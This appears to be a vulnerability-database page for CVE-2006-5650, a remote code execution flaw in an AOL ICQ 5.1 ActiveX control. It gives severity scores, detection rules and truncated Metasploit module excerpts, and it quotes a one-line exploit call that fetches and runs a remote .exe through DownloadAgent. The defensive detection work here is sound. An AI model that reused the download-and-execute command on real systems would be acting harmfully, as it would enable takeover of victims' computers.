CVE-2006-5650
published 2006-11-07CVE-2006-5650: The ICQPhone.SipxPhoneManager ActiveX control in America Online ICQ 5.1 allows remote attackers to download and execute arbitrary code via the DownloadAgent…
PriorityP354high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
66.37%
99.2th percentile
The ICQPhone.SipxPhoneManager ActiveX control in America Online ICQ 5.1 allows remote attackers to download and execute arbitrary code via the DownloadAgent function, as demonstrated using an ICQ avatar.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aol | icq | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandnew ActiveXObject('ICQPhone.SipxPhoneManager.1'); .DownloadAgent("<payload_url>/<exe>.exe");↗
- →Detect instantiation of the vulnerable ActiveX control by its ProgID 'ICQPhone.SipxPhoneManager.1' or CLSID '54BDE6EC-F42F-4500-AC46-905177444300' in HTML/script content delivered over HTTP. ↗
- →Inspect HTTP responses for calls to the DownloadAgent method on the ICQPhone.SipxPhoneManager ActiveX object; the method is used to fetch and execute a remote .exe payload. ↗
- →HTTP response serving the exploit delivers 'Content-Type: application/octet-stream' for the PE payload; correlate with a prior HTML page referencing CLSID 54BDE6EC-F42F-4500-AC46-905177444300 to identify the full attack chain. ↗
- →The exploit can be triggered via an ICQ message (e.g., a malicious avatar), so monitor ICQ client network traffic for outbound HTTP requests to attacker-controlled hosts fetching .exe files shortly after message receipt. ↗
- ·The Metasploit module uses randomised variable names (rand_text_alpha) and randomised uppercase .exe filenames (rand_text_alpha_upper), so static string matching on variable names or filenames in the HTML payload will not be reliable; detection should focus on the stable ProgID/CLSID and DownloadAgent method call pattern. ↗
- ·The module's URIPATH defaults to '/' and the payload is served under a '/PAYLOAD' sub-path; the actual URI is configurable by the attacker, so path-based detection alone is insufficient. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
America Online ICQ - ActiveX Control Arbitrary File Download and Execute (Metasploit)
exploitdb·2010-11-24
CVE-2006-5650 America Online ICQ - ActiveX Control Arbitrary File Download and Execute (Metasploit)
America Online ICQ - ActiveX Control Arbitrary File Download and Execute (Metasploit)
---
##
# $Id: aol_icq_downloadagent.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'America Online ICQ ActiveX Control Arbitrary File Download and Execute',
'Description' => %q{
This module allows remote attackers to download and execute arbitrary files
on a users system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Rev
Exploit-DB
America Online ICQ 5.1 - ActiveX Control Remote Code Execution
exploitdb·2006-11-06
CVE-2006-5650 America Online ICQ 5.1 - ActiveX Control Remote Code Execution
America Online ICQ 5.1 - ActiveX Control Remote Code Execution
---
source: https://www.securityfocus.com/bid/20930/info
The America Online ICQ ActiveX Control is prone to a remote code-execution vulnerability.
An attacker could exploit this issue simply by sending a message to a victim ICQ user. Successful exploits could allow the attacker to execute arbitrary code.
The ICQPhone.SipxPhoneManager ActiveX control with the following CLSID is affected:
54BDE6EC-F42F-4500-AC46-905177444300
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3
Metasploit
America Online ICQ ActiveX Control Arbitrary File Download and Execute
metasploit
America Online ICQ ActiveX Control Arbitrary File Download and Execute
America Online ICQ ActiveX Control Arbitrary File Download and Execute
This module allows remote attackers to download and execute arbitrary files on a users system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.
No writeups or analysis indexed.
http://secunia.com/advisories/22670http://securityreason.com/securityalert/1830http://securitytracker.com/id?1017163http://www.securityfocus.com/archive/1/450726/100/0/threadedhttp://www.securityfocus.com/bid/20930http://www.vupen.com/english/advisories/2006/4362http://www.zerodayinitiative.com/advisories/ZDI-06-037.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/30059http://secunia.com/advisories/22670http://securityreason.com/securityalert/1830http://securitytracker.com/id?1017163http://www.securityfocus.com/archive/1/450726/100/0/threadedhttp://www.securityfocus.com/bid/20930http://www.vupen.com/english/advisories/2006/4362http://www.zerodayinitiative.com/advisories/ZDI-06-037.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/30059
2006-11-07
Published